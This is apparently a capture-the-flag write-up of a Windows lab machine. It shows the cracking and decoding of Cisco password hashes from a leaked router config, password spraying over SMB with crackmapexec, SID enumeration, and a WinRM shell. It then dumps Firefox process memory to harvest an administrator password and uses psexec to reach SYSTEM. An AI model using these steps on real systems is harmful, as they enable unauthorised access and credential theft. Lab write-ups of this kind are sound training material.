# RECON
## NMAP
```txt
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
| http-title: Support Login Page
|_Requested resource was login.php
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Microsoft-IIS/10.0
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-02-28T02:31:53
|_  start_date: N/A

5985/tcp  open  wsman

```

## Web
- Greeted with login page, try default credentials but doesn't it work. We also have an option to login as a guest.
- Redirected to `issues.php`
```txt
Hi, I've been experiencing problems with my cisco router. Here's a part of the configuration the previous admin had been using. I'm new to this and don't know how to fix it. :(
```
- There's an attachment we can download, config.txt
```txt
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0Â mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh
```
- I'm not sure what I'm looking at.
`$1$pdQG$o8nrSzsGXeaduXrjlvKc91`
`rout3r:0242114B0E143F015F5D1E161713`
`admin:02375012182C1A1D751618034F36415408`

- One thing we know that it's a cisco router.
- Checking the first hash with hashid it is a cisco type 5 md5 hash
`$1$pdQG$o8nrSzsGXeaduXrjlvKc91`
- We can crack it using john.
`stealth1agent`
- The 2 hashes for the user were type 7, I found it by looking at [here](https://www.router-switch.com/faq/six-types-of-cisco-password.html)
- It's not really a hash but uses Vignere cipher.
`rout3r:$uperP@ssword`
`admin:Q4)sJu\Y8qz*A3?d`

## SMB
- Save all the passwords and usernames and let's spray it at SMB to see what credentials are valid
```sh
┌──(user㉿kali)-[~/ctf/heist]
└─$ crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt --shares --continue-on-success
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 

┌──(user㉿kali)-[~/ctf/heist]
└─$ crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt --shares                                                                                                                                                                     130 ⨯
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent 
SMB         10.10.10.149    445    SUPPORTDESK      [+] Enumerated shares
SMB         10.10.10.149    445    SUPPORTDESK      Share           Permissions     Remark
SMB         10.10.10.149    445    SUPPORTDESK      -----           -----------     ------
SMB         10.10.10.149    445    SUPPORTDESK      ADMIN$                          Remote Admin
SMB         10.10.10.149    445    SUPPORTDESK      C$                              Default share
SMB         10.10.10.149    445    SUPPORTDESK      IPC$            READ            Remote IPC

```
- We can read IPC$ but can't list files.

## RPC
- We can login using the credentials of hazard and we can enumerate SIDs
```txt
 S-1-5-21-4254423774-1266059056-3197185112-500 Administrator
```
- We can use a tool from impacket called `lookupsids.py`
```sh
┌──(user㉿kali)-[~/ctf/heist]
└─$ lookupsid.py hazard:stealth1agent@10.10.10.149             
Impacket v0.9.25.dev1+20220208.122405.769c3196 - Copyright 2021 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
```
- We now have new users to add to our usernames.txt
- We can check the credentials again using SMB to find valid ones.
```sh
┌──(user㉿kali)-[~/ctf/heist]
└─$ crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt --shares --continue-on-success
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\chase:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\chase:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\chase:Q4)sJu\Y8qz*A3?d 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\jason:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\jason:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
```
- A new valid credentials `chase:Q4)sJu\Y8qz*A3?d`
- Same permissions as `hazard` can read IPC$

# Foothold
- We can try the valid credentials against winrm.
- And we can get a shell as user `chase:Q4)sJu\Y8qz*A3?d`
- 
# Post-exploit
- No interesting privileges

## Internal Enumeration
```txt
    Folder: C:\windows\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]
   =================================================================================================


    Folder: C:\windows\system32\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]

  TCP        127.0.0.1             49672         127.0.0.1             49673           Established       700             C:\Program Files\Mozilla Firefox\firefox.exe
  TCP        127.0.0.1             49673         127.0.0.1             49672           Established       700             C:\Program Files\Mozilla Firefox\firefox.exe
  TCP        127.0.0.1             49674         127.0.0.1             49675           Established       5016            C:\Program Files\Mozilla Firefox\firefox.exe
  TCP        127.0.0.1             49675         127.0.0.1             49674           Established       5016            C:\Program Files\Mozilla Firefox\firefox.exe
  TCP        127.0.0.1             49678         127.0.0.1             49679           Established       5960            C:\Program Files\Mozilla Firefox\firefox.exe
  TCP        127.0.0.1             49679         127.0.0.1             49678           Established       5960            C:\Program Files\Mozilla Firefox\firefox.exe
  TCP        127.0.0.1             49682         127.0.0.1             49683           Established       6776            C:\Program Files\Mozilla Firefox\firefox.exe
  TCP        127.0.0.1             49683         127.0.0.1             49682           Established       6776            C:\Program Files\Mozilla Firefox\firefox.exe

  UDP        127.0.0.1             49664         *:*                            2684              svchost

  Firefox credentials file exists at C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles\77nc64t5.default\key4.db
```


## Privilege Escalation
- We see a lot of firefox instances running.
- We can use a tool called `procdump64.exe` to dump the procces.
- We have to use `strings` on it first since it's in binary.
- Now let's look for interesting strings like `password`
```sh
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
	```
`administrator:4dD!5}x/re8]FBuZ`
```sh

┌──(user㉿kali)-[~/ctf/heist]
└─$ psexec.py "administrator:4dD\!5}x/re8]FBuZ"@10.10.10.149  
Impacket v0.9.25.dev1+20220208.122405.769c3196 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.149.....
[*] Found writable share ADMIN$
[*] Uploading file pqjlevfX.exe
[*] Opening SVCManager on 10.10.10.149.....
[*] Creating service NMeu on 10.10.10.149.....
[*] Starting service NMeu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> cd ..

C:\Windows> cd ..

C:\> cd users

C:\Users> type administrator\desktop\root.txt
8c685fc7546ae564e2212dd5307ea210

```